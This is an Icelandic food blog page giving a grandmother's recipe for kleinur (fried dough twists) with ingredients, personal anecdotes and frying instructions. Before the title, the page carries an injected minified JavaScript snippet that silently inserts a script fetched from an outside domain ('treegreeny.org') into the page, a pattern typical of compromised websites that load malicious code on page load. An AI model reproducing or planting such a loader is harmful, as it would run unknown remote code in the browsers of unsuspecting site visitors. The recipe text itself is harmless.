;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ömmukleinur – Eydís — Ljósmyndun

Ömmukleinur

1.2 kg hveiti
250 gr sykur
1 tsk hjartarsalt
6 tsk lyftiduft kúfaðar
4 egg
1 peli rjómi
tæpl 5 dl mjólk+ súrmjólk
2 tsk kardimommudropar
1 dl olía

Þetta gerir c.80-90 kleinur
Kristjáns steikingarfeiti eða palmín

Kleinur, lopapeysur, mjólk og gamaldags stell.
Allt svo íslenskt og minnir mig á ömmu.  Ég borða þær sjaldan en þær eru eitt uppáhalds bakkelsið mitt. Það tók mig nokkrar uppskriftir og mörg ár að læra að búa til kleinur sem ég var ánægð með. Takið með í reikninginn að ég bý til kleinur afskaplega sjaldan. Ég byrjaði með aðra uppskrift,  flatti deigið of þunnt, skar það of langt,  svo úr urðu stökkar kexkleinur með olíubragði.
En þessi uppskrift! Hún slær alltaf í gegn. Frábærar kleinur.

Allt sett í stóra skál og blandað vel saman, sett á hveitistráð borð og hnoðað þar til deigið verður þjált. Hafið hveiti til taks og bætið út í eftir þörfum. Flatt út og haft
c.2-3 cm þykkt og skorið út með kleinuhníf.  Snúið í litlar klaufakleinur og geymið á hveitistráðum bökkum þar til þeir steypa sér í ánna. Mér finnst alltaf eins og ég sé
að senda þær í stríð. Hitið Kristjáns steikingarfeiti, já það verður að vera Kristjáns steikingarfeiti 😉  þar til hún er vel heit og byrjið að steikja. Ég hita olíuna hægt þar til hún nær góðum hita og byrja þá að steikja, eftir nokkrar umferðir lækka ég kannski hitann um 1-2 í smástund og hækka svo aftur. Það skiptir máli að þær verði gullnar og ekki of dökkar.

 

Leave a Reply

Your email address will not be published. Required fields are marked *